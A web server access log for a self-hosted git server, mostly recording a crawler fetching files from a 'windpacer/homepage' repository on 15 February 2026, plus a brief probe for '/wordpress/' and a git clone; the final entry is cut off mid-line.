"/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 216.73.216.188] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10906] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:50:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fhtml%2Fassets%2Fcss%2Fstyle.css" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:54:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13135] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:55:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10979] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:56:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/css/style.css" [Client 216.73.216.188] [Length 10127] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:16:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:35:31 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 35.198.229.71] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36" "-" -[15/Feb/2026:17:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 35.198.229.71] [Length 5682] [Gzip 2.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36" "-" -[15/Feb/2026:17:35:35 +0000] - - 301 - GET http git.hanmocnn.co.kr "/wordpress/" [Client 35.198.229.71] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36" "-" -[15/Feb/2026:17:35:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/wordpress/" [Client 35.198.229.71] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0 Safari/537.36" "-" -[15/Feb/2026:17:50:48 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:50:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2Fnpm%2Fletsencrypt" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:55:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx?display=source" [Client 216.73.216.188] [Length 14866] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx?display=source" [Client 216.73.216.188] [Length 15598] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:55:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13198] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx?display=rendered" [Client 216.73.216.188] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:55:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:55:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:56:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 216.73.216.188] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 216.73.216.188] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:59:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx?display=rendered" [Client 216.73.216.188] [Length 10952] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:59:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/About.tsx?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:59:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:59:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx?display=rendered" [Client 216.73.216.188] [Length 10949] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:59:53 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/%7Bservice.image%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:17:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13192] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:01:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:01:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:01:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10877] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:03:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:04:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:07:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:09:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:18:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:00:46 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:19:00:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 178] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:19:00:46 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-upload-pack" [Client 222.117.41.51] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[15/Feb/2026:19:15:20 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 1372] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 13216] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css/style.css?display=rendered" [Client 216.73.216.188] [Length 10962] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:16:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F2681563c08aa04fbea2862fbca273762e67c16d6%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:16:04 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 9891] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:16:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 9895] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 9890] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 216.73.216.188] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:19:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 9890] 